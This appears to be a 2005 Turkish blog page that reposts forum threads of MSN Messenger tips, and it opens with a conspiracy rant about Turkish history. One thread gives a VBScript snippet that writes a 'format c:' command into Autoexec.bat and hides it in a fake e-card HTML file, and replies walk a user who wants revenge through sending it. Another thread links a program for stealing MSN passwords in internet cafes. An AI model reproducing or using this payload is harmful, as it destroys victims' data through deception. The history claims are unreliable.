GiRiS....

1839 a kadar Türk Milletini delikanlica savas meydanlarinda durduramayan, yenemeyen barbar ve geri kalmis Batililar careyi; icimizdeki cürükleri kendi cikarlari dogrultusunda egitmekte ve kullanmakta buldular. Kullandiklari insanlara "JÖNTÜRKLER" denildi. Bunlar; Ingiliz ve Fransizlar tarafindan, Osmanliyi icten yikmak icin madden destekleniyor ve kullaniliyorlardi. JönTürkler; Türk Imparatorlugunun temel yapisina sinsi sinsi girerek, Osmanli Devletini icerden zehirledi. Tanzimat, 1. Mesrutiyet, 2. Mesrutiyet, vs..bu satilmislarin ürünü idiler. 1907 yilindan sonra ise; Osmanli imparatorlugunu kullanma ve sömürme isine Almanlar sahip ciktilar. Enver Pasa, Ingiliz ve Fransizlarin terkini ve Almanlarin kucagina oturmayi 30.000 Alman Altini karsiliginda baslatti. 1907 yilindan 1922 yilina kadar Alman sömürgesi idik. 1922 yilinda Ingiliz ve Fransizlarla yapilan gizli bir anlasma ile T.C. Devleti kuruldu ve 1943 yilina kadar Ingiliz ve Fransiz sömürgesi olarak yasadik. 1943 yilinda ABD ile yapilan anlasma ile, ABD sömürgesi yapildik. Genel Kurmayimiz, Dünyanin hicbir yerinde görülmemis olan arsivleri acmama islemini yaparak, Türk Milletinin bu satilmislik gerceklerini saklamak mi istemektedir. Evrensel hukuka göre arsivler 25 yildan fazla kapali tutulamaz. Bizim arsivlerimiz ise halen bizlerden saklanilmaktadir. Devletlerarasi yapilan anlasmalarin hepsini, bizde olmasa bile, bizimle anlasma yapan ülkelerin arsivlerinde bulmak mümkündür. iste bu dis arsivlere dayanarak, bize ögretilen TÜRK TARiHiNiN yalan oldugunu -hakli olarak- iddia edenler vardir. Bu Site deki makalelerin geneli sahsima ait degildir. Geneli alintidir. Kendime ait olanlarin altinda "mim" imzam vardir. iyi okumalar, irdelemeler ve arastirmalar dilegimle. mim

12 Temmuz 2005

MSN´in PÜF NOKTALARI


Msn nin Püf noktaları

- Msn nin Püf noktaları
1) Camerası olanları ögrenmenin yolu

Msn 6 veya üzeri bir msn versionu kullanıyorsanız,konuştugunuz kişinin nicki ve mail adresinin yazdıgı yerde :
Örnolat_alemdar_ (camera işareti )
İşte burda eger webcam işareti beliriyorsa o kişide webcam var demektir,bu da aklınızın bir köşesinde bulunsun.
Cameram yok diyen bayanlar çogunlukta oldugu için )

Not: Bir süre bekleyin bu ıcon'nun açılması için,eger gözükmezse zaten webcam yoktur kullanıcıda..

Maillerden gönderenlerin IP numarasını görmenin yolu :

2)Maillerden gönderenlerin IP numarasını görmenin yolu :

Hotmail'den IP Öğrenme: Hotmail hesabınız açın sırasıyla : options >>> Additional Optionstan Mail Display Settingse >>> Message Headers kısmına gelin >> Full'u işaretleyip ok e tıklayıp inbox'a geçin, gelen maile tıklayın. Mail açıldığında yazan kişinin IP adresini mailin üstünde ki yazılardan görebilirsiniz.

Yahoo Mailden IP Öğrenme: Yahoo mail hesabınıza girin inbox'a gelin >>> okuyacağınız mail'i açın >>> ve sağ üst köşede " Full Headers " yazısına tıklayınca. Mail'i yazan kişinin IP adresini görebilirsiniz...

3)Birisi sizi listesinden silmişse nasıl ögreniriz bunu ?

Cevap (gecekusu_always.) : Bunu ögrenmenin yolu :

Msn üzerinde ki Araçlar'a tıklayın >>>> Seçenekler >>> Gizlilik >>> İki kutu göreceksiniz " sol tarafta ki izin verdikleriniz " " sağ tarafta ki kutuda ki nickler Engellediginiz " şimdi bu nickler üzerinde veya adresler üzerinde,sağ tuş yapın tek tek.Eğer SİL seçenegi aktif ise,bu kullanıcı sizi listesinden atmış demektir.

4)SORU : Msn açılışta,otomatik olarak oturumumun açılmasını istemiyorum,parolamı hatırla seçenegini kaldırmak istiyorum,bunu nasıl yaparım ?

CEVAP ( MoNsteR. ) : Bunun için yapmanız gerekenler arkadaşlar :

Başlatta basın >> denetim masasına girin >> Kullanıcı Hesapları >>> Kendi kullandıgınız hesabı seçin >>> sol üst kısımda " AĞ PAROLALARIMI YÖNET"'e tıklayın >>> burda MSN'de girdiginiz hesaplar bulunacak.

Otomatik açmayı ( parola hatırlamayı önlemek ) bunun için Passport.Net\* Bunun üzerine tıklayıp,kaldırını tıklayın.
Bu sizin parolamı hatırla olayını kaldıracak ve size artık parola soracaktır.

Hesapları isterseniz kaldırabilirsiniz,böylece sizin ortak olarak kullandıgınız bilgisayarda,kullandıgınız mail adresilerini görmelerini engellersiniz.

5) Siz PC başında yokken yazanlar sinir olsunlar :

Birini sinir etmek istiyorsanız ve Plus yüklü ise msn'de,yapmanız gereken durumunuzu seçtiginiz yerde ( listezin oldugu MSN ana yerinin üzerinde nickiniz yazar,Nickin oldugu yerde MSN Yeşil adam sembolu vardır onun yanında bir ok işareti göreceksiniz,tıklayın. ) " Daha Çok Durum " bölümüne gelin ve Çoklu Ortam İletileri seçin.

Size yazana msn kendi kendine her yazışında cevap verecek,hatta azarlıyacak bu şekilde msn yazan kişiyi

Örnek :

Başkası :
Slm

Siz :
auto-message: Uygun değilim

Başkası :
Nasıl degilsin ?

Siz :
auto-message: Uygun değilim dedim ya

Başkası :
anlamadım ?

Siz :
auto-message: Laftan anlamaz mısın sen? UY-GUN DE-Ğİ-LİM

MSN V. 6.0 ve 6.1 için geçerlidir + PLUS yüklü olması gerekiyor
05-07-2005, 06:17 PM #2

- " Msn 6 veya üzeri bir msn versionu kullanıyorsanız,konuştugunuz kişinin nicki ve mail adresinin yazdıgı yerde :
Örnolat_alemdar_ (camera işareti )
İşte burda eger webcam işareti beliriyorsa o kişide webcam var demektir,bu da aklınızın bir köşesinde bulunsun.
Cameram yok diyen bayanlar çogunlukta oldugu için )
Not: Bir süre bekleyin bu ıcon'nun açılması için,eger gözükmezse zaten webcam yoktur kullanıcıda..
bunu bilmiyordum mükemmel bir şey
05-09-2005, 03:34 PM #4

- uğraşıpta bilgi paylaşımın için teşekkürler
bilmeyenler için çok iyi bilgiler kardeş
05-10-2005, 09:28 PM #5

- bayaa işe yaradı eywallah, iyi çalışma
05-10-2005, 10:35 PM #6

- ne demek arkadaşlar biraz da reput verirseniz sevinirim yani
05-17-2005, 05:04 PM #7

- arkadaslar ya bu msn de karşı tarafın ifadelerini almak için sağ tıklayıp ekle yapıyordum.yeni sürümünde ifadeyi sağ tıklayınca sadece kopyala var.ifadeleri nasıl ekleyebilrim?
tskk

- Arkadaşlar şunuda söleyim o kamera işaretinin olması he zaman o kişinin kamerası olduğunu göstermez eğer kişinin kamerası yoksa tv katı varsa kamera işareti yinede çıkar...
06-02-2005, 08:47 PM #12

- "Arkadaşlar şunuda söleyim o kamera işaretinin olması he zaman o kişinin kamerası olduğunu göstermez eğer kişinin kamerası yoksa tv katı varsa kamera işareti yinede çıkar...
Olabilir,,, bide ben ekliyim birşEY,,
Kamera işaretinin gözükmesi, kameranın takılı olup olmadığını gösterir,,
Kamera şayet bozuksa, fakat gene takılıysa,gene kamera işareti görünür
NOT: Benim eski kamerada öyleydi bozuktu,, ama karşıdaki kamera işaretini
görüyordu
07-06-2005, 06:27 PM #13

- ya size bir sorum var bulana ben den bir çikolata msn de bir kişi kamerayı açmak istemiyorsa sen de ondan gizli nasıl açarsın bilen var mı ........CEVABI BENDE MERAK EDENLER SEN_BEN_BEN@SEN.NET msn adresime gelip öğrenebilir...denemesi bedava
07-07-2005, 02:28 AM #14

- arkadaslar ya bu msn de karşı tarafın ifadelerini almak için sağ tıklayıp ekle yapıyordum.yeni sürümünde ifadeyi sağ tıklayınca sadece kopyala var.ifadeleri nasıl ekleyebilrim?
tskk
arkadsım bunun için hani hotmailden adres alırken snn ülkeni istio ya oraya almanya wea bir ab ülkesi olması lazım cnku msn bu özelliği türklere tanımamıs
07-07-2005, 03:54 AM #15

- bilgi paylaştıkça güzeldir...
saolasın
07-07-2005, 06:54 PM #16

- ee ne olcak öğrenince adamların ip si zırt pırt değişiyor.öğrenince yapılabilcekler nelerdir onları yaz.ip yi nörecen kii

Msn de Karşıdaki Bilgisayar Format Atmak

- Msn de Karşıdaki Bilgisayar Format Atmak

Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
Giriste ac1lan uyariya "HAYIR" dediyseniz
href="javascript:reload()">Malesef e-kart 1n1z cal1smayacakt1r.
Bu kodları bi not defterine yazın ve e-kart.html diye kaydedin sonra msnde karşınızda düşmanınıza yollayın. oda bunu açıp kartı Görüntülemek için eveti tıklayın diye bi seçenek var onu tıklayınca Makinesi otomatikmen format yiyecek. Kolay Gelsin...
Bunu başkasına yapın diye söylemiyorum. başkası size yapacağı zaman bilin diye söylüyorum. ama burda msn den formattan korunun yazsam kimse bakmaz bu mesaja böyle yazınca belki dikkatinizi çekerde en azından makinenizi kurtarırsınız.
06-22-2005, 12:06 AM #2

- Verdiğin Bilgiler için teşekkür ederim.
06-22-2005, 05:47 PM #3

- çok güzel bilgi....ama bence yine de insanlar bunu başkasına yapmak için kullanıcak....yine de dikkat çekmen için teşekkürler...dmeek ki neymiş....başkasından html dosyası da almıcakmışız....
06-22-2005, 06:10 PM #4

- wııışşş aha...bundan sonra msn den dosya alış verişi yok...
06-22-2005, 06:13 PM #5

- demek ki işe yaradı verdiğim bilgi. en azından şimdiye kadar okuyanlar kötü amaçla kullanmadı...(yada ben öyle düşünüyorum)
06-22-2005, 06:27 PM #6

- ben kötü amaclı kullancam ahauhauaaauauahauauaauauh
06-22-2005, 06:36 PM #7

- yaa arkadaşlar içimden geçmio değil yapmak ama zor tutuorum valla :=)))
Çok saol Gulencocuk abi :=)
06-23-2005, 10:11 AM #9

- Abi gerçekten doğru söyledin. milletin bu hackerlığa merağını anlamış değilim. neden başkalarına zarar vermek bu kadar zevk verio onlara. ama sanırım sende zamanında yapmışsın birşeyler
06-27-2005, 02:28 PM #10

- GulenCocuk oncelikle selamlar
sana ozelden yazmadım kuralalara aykırı olur diye
bir sorum olacaktı
mesela bu kodları kopyalayarak olusturdugumuz html yi
e postalara da attach yaptıgımızda
aynı sekilde iletiyi alan kişi de
bunu acıp okumak için evet dediginde aynı sey oluyor mu???
yoksa sadece msn uzerinden kurulan baglantı ile mi oluyor bu???
cahillihimi bagısla...
sadece merak ettim de...uygulama gibi bir niyetim yok...

- "GulenCocuk
oncelikle selamlar
sana ozelden yazmadım kuralalr aykırı olur diye
bir sorum olacaktı
mesela bu kodları kopyalayarak olusturdugumuz html yi
e postalara da attach yaptıgımızda
aynı sekilde iletiyi alan kişi de
bunu acıp okumak için evet dediginde aynı sey oluyor mu???
yoksa sadece msn uzerinden kurulan baglantı ile mi oluyor bu???
cahillihimi bagısla...
sadece merak ettim de...uygulama gibi bir niyetim yok...
Dostum her şekilde oluyor. nasıl fake kodu ile şifre alınıosa bu kod ile makinenin format özelliğini aktif hale getirdiğin için makine kendi kendini formatlıo. yani amaç burda bu html dosyasını bilgisayara yükletip. açtırıp evet demesini sağlamak. ister mail ile ister msn ile istersen disket ile ilet.
06-28-2005, 01:07 PM #12

- sagol
o zaman artık aldıgımız e-mail ler bile tehlikeli...
ben seyden sordum,,,bir arkadas msnden artık dosya almamalıyız demişti
ama her sekilde tehlike altındayız....
06-30-2005, 01:28 AM #13

- yaw kardes kuru kuru yasanmaz ki.. tabbi ki arada bi böyle seyler yapacaz. dostlarimiza deil sadece düsmanlarimiza. saol.devam...
06-30-2005, 06:35 PM #14

- ya arkadaşlar özürdilerim ama benim anlamadığım bu komutları nasıl html dosyası haline getirecem burdan kopyalayıp worde yapıştırsam olurmu ordan kayıt etsem ??? (kusuruma bakmayın pek anlamam bi intikam almam lazımda yardımcı olursanız çok sevinirim) iy çalışmalar
06-30-2005, 07:27 PM #15

- "ya arkadaşlar özürdilerim ama benim anlamadığım bu komutları nasıl html dosyası haline getirecem burdan kopyalayıp worde yapıştırsam olurmu ordan kayıt etsem ??? (kusuruma bakmayın pek anlamam bi intikam almam lazımda yardımcı olursanız çok sevinirim) iy çalışmalar
Dostum bu kodları istediğin bir yazı yerine yaz. sonrada farklı kaydet de ve dosyanın adını selam.html yap. selam yazdığın yeri değiştir istediğini yap ama sonundaki .html yi aynen yaz. ondan sora kaydedince kaydettiğin yerde web sayfası şeklinde görünecektir. geriside bildiğin gibi. o web sayfası şeklindekini adama yollayacaksın adamda kabul edecek ve güm.!
06-30-2005, 08:05 PM #16

- sağol ama işime yaramayacak
06-30-2005, 10:22 PM #17

- "sağol ama işime yaramayacak
Dostum işine yaramayacaksa kullanmassın olur biter. ama emin olki bir çok kişinin işine yarayacaktır. en azından başkalarından dosya alırken biraz daha tedbirli olurlar..
Oyun Bitince Şah da, Piyon da, Aynı Kutuya Konur...
07-01-2005, 02:39 PM #18

- gulencocuk yardımların için çooook tşk ederim sağol iy çalışmalar dostum...

gulen çocuk özürdilerim biraz kafanı ağrıtıyorum ama kopyala yapıştır yöntemi yapabilirmiyim yazdığın komutları komple koplayıp yapıştırabilirmiyim??
07-01-2005, 02:57 PM #22
- biraz kafanı ağrıtıyorum ama kopyala yapıştır yöntemi yapabilirmiyim yazdığın komutları komple koplayıp yapıştırabilirmiyim??
ne demek kafanı ağrıtıyorum yaa bildiğim konuda size yardım etmek için burdayım ben. soruna gelince tabiki yapabilirsin başka türlü bu komutları nasıl alacaksınki Hepsini seçip sağ tıkla kopyala de note pad e yapıştır. gerisini anlattım zaten. Kolay gelsin..
07-01-2005, 04:07 PM #23

- sağol dostum senin hakkın ödenmez ilgine ve alakana çok tşk ederim..
07-04-2005, 12:50 PM #24

- "Eee herkes insan olacak die bi kaide yok
---> Gulencocuk®

Mesajın tarafımdan editlenmiştir. daha seviyeli bir forum için daha seviyeli olmanızı bekliyorum...
07-04-2005, 02:14 PM #25

- Gülen çocuk çok güzel dökümanlar hazırlıyosunda bi de şu forum altında kullanığın (imza) resimlerin olmasa daha iii olur diyorum.Sana çalışmalarında başarılar dilerim...herkese iii günler..
07-04-2005, 03:05 PM #26

- valla bende hep arkadaş var eğer tanımadığım ve bana uzak birine gıcık olursam yaparım. ama şuan öle bi düşüncem yok
iLetişim için msn adresim:
http://img67.imageshack.us/my.php?image=trforum8bn.gif
07-05-2005, 06:39 PM #27

- Vallahi arkadaşlar msnden korkmaya başladım
07-05-2005, 11:29 PM #28

- hoca büyüksün ne diyeyim başka....yaktımm birilerinin çırasını intikammmmmmm
07-07-2005, 06:45 PM #29

- beyler yuhunuz yani.cidden bu internetin çivisi çıktııı.bu ne ya çoluk çocuk bile hacker lığa özeniyor.geçen salağın birisi ben çpk iyi hackerım bak şimdi bilgisayarına girecem format atacam sana dedi.bende heee dedim.salak bana dosya yolluyor.bende al bunu münasip bir yerine monte et dedim.ala ala bu ne ya.adama inat bende 1 hafta accountunu freeze ettim.cezasını çekmiştir!! bırakalım insanlara zarar verecek şeylerele uğraşmayı
07-07-2005, 06:50 PM #30

- Kardeş hitap tarzını biraz daha nazikleştirsen emin olki sölediklerin dikkate alınması gereken sözler. kimseye zarar verilmesini bende istemiyorum. ama insanlarn bu tür bi dosyaya karşı uyarısını yapmanında onlara nasıl olacağını anlatmadan gösteremiyorsun... bilmem anlatabildimmi...

CAfeden Msn Ye Girenlerin Şifresini ÇAlma

- CAfeden Msn Ye Girenlerin Şifresini ÇAlma
cafeden nete girenler için birebir bir proglam
ag komsularindan yararlaniyor ve msn sifrelerini almaniza yariyor
http://www.elvisciotti.it/pclandia/downloads/mpv.zip
05-07-2005, 09:55 AM #2

- Artık Msn'yi cafe kullanmak güvenli değil. İcq'ya geri mi dönsek ne
05-07-2005, 10:02 AM #3

- ıcq için de bu tip programlar var artık cafelerde net bağlantısı sakıncalı!!!!
05-07-2005, 10:08 AM #4

- "ıcq için de bu tip programlar var artık cafelerde net bağlantısı sakıncalı!!!!
Haklısın ama Msn Messenger'ın artık cıvkı çıktı. İcq hem daha güvenli hemde iyi. Ayrıca icq'nun yeni sürümleri çok güzel...
05-07-2005, 10:12 AM #5

- Haklısın
05-07-2005, 12:44 PM #6

- ya bırakın icq yu filan...msn en iisi...msn de gidip msn 7 beta kullanmakta israr etmiyeceğiniz zaman en iisi..ayreıca fun paketler de dahil..bu tur seyler torjan spy bulastırır..icq da hack malı oldu resmen size bi surur 6-7 li daıtırım..bence msn den sasmayın..özellik olarak da fazla
05-07-2005, 04:58 PM #7

- walla tırstım msn falan yok artık dısarda...
05-07-2005, 11:34 PM #8

- cafeden msn açmiyim ben
05-08-2005, 08:32 PM #9

- ama artık çoğu cafe önlemini aldı.Sorduklarımın hepsi deep-freeze kullanıyor.
05-09-2005, 02:58 PM #10

- msn tehlike artık

- Bu programın hiç 1 esprisi yok.Yada bende yapamadım. Çünkü çalıştırdığın bilgisayardaki otomatik açmaya ayarlanmış hesapların şifrelerini veriyor.Başka da 1 fonksiyonu yok.
Heart Of Technology
06-09-2005, 04:43 PM #18

- hakikaten zor bir iş bu msn
06-10-2005, 02:18 PM #19

- Cok SAOl Da Ben Biri Hacklicekken Ya Beni Hacklerlerse Korkuyorum Msn Acmıcam Cafeden Bundann SoNra
06-10-2005, 07:48 PM #20

- tehlikeli olmayan bişey kalmadıki artık

- icq 5 super arkadaşlar birde oyunlar var koparsınız war sheep favorım benım
07-04-2005, 01:55 PM #23

- "way be ne yapıyor adamlar, vallaha artık tehlikeli kafelerde msn
Yaa arkadaşlar tanıdık bi kafeye giderseniz ne olcakki..Bilmediğiniz bi kafeye gittiğinizde adam keylogger yükledikten sonra böyle programlara gerek kalmaz zaten.Bütün günün loglarını tutar.
Eğer internet kafede girip çıktıktan sonra başkasının msn adresini görmesini istemiyosanız(farklı oturum aç'tan) Start>Run yaptıktan sonra control keymgr.dll yazın.Çıkan pencereden mail adresinizi silin.OK.Bu yöntem geçmiş konularda yazılmış olabilir...hadi size iii çalışmalar...
07-06-2005, 02:10 PM #24

- ee hocam niye çalışmıyo ağda o kadar bilgisaya var
07-06-2005, 02:56 PM #25

- kardeşim nasıl çalışıyor bu program
07-07-2005, 03:50 AM #26

- bu programı nasıl çalıştıracağız neler yapacağız anlatırmısın dostum
07-07-2005, 03:42 PM #27

- Millet bu program sadece otomatik olan açılmış adresler içindir
07-07-2005, 04:01 PM #28

- Dostlarım konunun sadece ana sayfadaki açıklamasına bakmayın konunun içinde sizin sorduğunuz soruların aynılarını soranlar var ve hepsine bir cvp verildi. bu kadar armut piş ağzıma düş muhabbeti yapmayın yaa az araştırmacı olun herşeyi bir yerde bulmaya çalışmayın. herşey TRFORUM da var zaten. bu halı altındaki ekmek gibi halıyı kaldırın ekmeği görün. neden halının üstünden bakıyorsunuzki yaa...bunu kullanamazsanız yine buna benzer bir programda ben verdim onu deneyin.
Kullanıcıyı Arkadaş Listeme Ekle
07-07-2005, 06:34 PM #29

- beyler icq felan hikaye.icq şifresini artık çoluk çocuk bile hack edebiliyor.en güvenli msn.yalnız anlatılan hususlara dikkat etmek kaydıyla.msn konusunda uğraşa uğraşa uzman oldum diyebilirim.msn şifrelerini hack etmenin zaten klasik yöntemleri var.bunu yiyen birisi varsa zaten bilgisayardan çakmıyor demektir.fake miş yalancı hotmail ekranıymış vs bunlar hep hikaye yapacağınız tek şey tanımadığınız insanlardan dosya alamamak ok gerisi fasa fiso asla şifrenizi hack edemezler.

Msn De Karşı Tarafı Sinir edin

- Msn De Karşı Tarafı Sinir edin
Aslında normalde çevrim içi göster çevrim dışı göster şeklinde tıklayarak bu işi hallediodunuz ama alın size benden bi program bu programla sadece kaç kere çevrim içi çevrim dışı olacağınızı yazıosunuz o kendiliğinden o anda hem çevrim içi hem çevrim dışı oluo karşı tarafında ekranı doluyor. ör: Programı açıosunuz (program dediğimde 4 KB büyük bişe sanmayın) Ordaki boşluğa rakamı yazıosunuz mesela "10" sonrada "Unlimited Change" ye basıyorsunuz. zor bişe değil yani. Programı indirmek için GuLeN{^{-_-}^}CoCuK resmine tıklayın...
Rar şifresi: Gulencocuk
06-24-2005, 05:24 PM #2

- emin olki bana bişe olmaz olan senin makinene olacak ben ikinci uyarıdan sonra pc den çıkan duman kokusuna bayılırım bilmem anlatabildimmi:P
06-25-2005, 11:49 PM #4

- link çalışmadı
07-07-2005, 05:19 PM #5

- Link Çalışmıyor...
07-07-2005, 05:41 PM #6

- nası link çalışmıyor yaa ben indirebiliyorumda sizmi indiremiyorsunuz yaa. hayret birşey.
Kullanıcıyı Arkadaş Listeme Ekle
07-07-2005, 06:08 PM #7

- Link çalışmıyor...
07-07-2005, 06:16 PM #8

- Size diyecek birşeyim yok walla bende çalışıyor karşı taraftaki bilgisayara gittim orda da indirdim. işten çıktım cafeye girdim ana makineden denedim indiriyordu, bi makineye oturdum orda denedim yine indirdim. mersindeki arkadaşıma söledim o da denedi indirdi siz indiremiyorsunuz. walla başta da dediğim gibi size diyecek hiç bir şeyim yok.

- Ayrıca Dünyanın en uzun domainine sahip bir mail adresiniz olsun istemezmisiniz BURAYA tıklayın kendinize bir mail alın ondan sonra arkadaşlarınıza mail gönderin ve onları şaşırtın mail büyük değil yada bariz bi dikkat çekici özelliği yok ama domain ismi çok uzun bu da eşantiyon olsun bunun için yeni konu açmak istemedim
Ama emeğime karşılık isterim haa
06-18-2005, 12:59 AM #3

- bak bu iyi geldi be. saolasin
We Make You Feel Alright
06-18-2005, 01:08 AM #4

- "bak bu iyi geldi be. saolasin
ben sizler için varım
06-18-2005, 02:18 AM #6

- "çok saol kardeş gerçekten muhteşem bişi
sen saol kardeşim yeterki emeğin karşılığını verin...
06-18-2005, 09:51 AM #7

- emeğine sağlık
çalışmalarını ilgi ile izlemeyedevam ediyorum
kolay gelsin
devamlı gülmen dileği ile

- Gulencocuk Bundan Sonra Bu Forumda...
Bak buna çok sevindim işte desene bizde bundan sonra bu forumda olcaz
06-20-2005, 12:19 AM #12

- sen iste yeterki teşekkür ederiz....
şiir bazen bir sanat
bazen duyguların yalnızlığı
bazende sessizliğin kulaklarda çınlaması
06-20-2005, 12:20 AM #13

- kardeş sana bir şey söyleyimde gülmek her zamn iyi değildir .arada bir ağlamak gerekir..
06-20-2005, 12:52 AM #14

- "kardeş sana bir şey söyleyimde gülmek her zamn iyi değildir .arada bir ağlamak gerekir..
Dostum düşünceler kişiden kişiye değişir, nesnel denen olayın öznel çeşididir bu benim dediğim, öznel olarak düşün olayı yani ben öznel olarak kendimi düşünüyorum ve ben her zaman gülerim, bana göre ağlamak acizliktir. sadece aciz insanlar ağlar, en son 6 yaşımda ağladım şimdi 26 yaşındayım ve bugüne kadar ağladığımı kimse görmedi....bence sende gül. gülmek herşeyi unutturuyor. kimseyi umursamadan gül. hatta bir söz vardır. akıllı olup dünyanın kahrını çekeceğine deli olda dünya senin kahrını çeksin. gül gülen kişi akıllı olamaz ben eminimki gülmek herkese yakışır. herkes gülsün kimbilir belkide gülmeyi hakeden nadir insanlardan biriside sensin....
06-20-2005, 03:01 AM #15

- arkadaşım mükemmel bir şey ama tek dezavantajı bulk mail bölümüne gönderiyor, çok sağol bizlerle paylaştığın için
06-20-2005, 04:03 AM #16

- baq bu çok işime yarayacak çok teşekkür ederim
06-23-2005, 10:10 AM #17

- Eee madem Gulencocuk bundan sonra bu forumda SanaL Baba da bundan sonra bu forumda
07-05-2005, 02:51 AM #18

- sen yeter ki tesekkür iste.Forumda gezinirken yanında nickini gördügüm herseye kesin kalite birşey yine diye bakıyorum. Her zaman gül..
07-05-2005, 05:24 PM #19

- valla helal ufkumuz genisliyo saolasin
07-05-2005, 09:16 PM #20

- eywallash saol. anonim mail servisi senin mi merak ettim..
iLetişim için msn adresim:
Alıntı:
osmis@emonyak.com
http://img67.imageshack.us/my.php?image=trforum8bn.gif

- Msn de istediğiniz videoyu izletmek

Msn de başkalarına Web cam açıp istediğiniz videoyu izletmek istermisiniz

BURAYA tıklayarak programı indirin
Hazır aklımdayken söliyeyim Rar Şifresi www.trforum.com
Msn de Araçlar Ses-Görüntü Seçeneklerine gelin.. Kamera yerinden Split cam i seçip devam edin hata verdi ama ben devam ettim sağda video yazısının altında motora benzeyen bir buton var onu tıklayıp izletmek istediğin videoyu seçiyorsunuz daha sonra cam bağlantısı kurun ve izletin
Gulencocuk Açıkara Önde
06-20-2005, 11:09 PM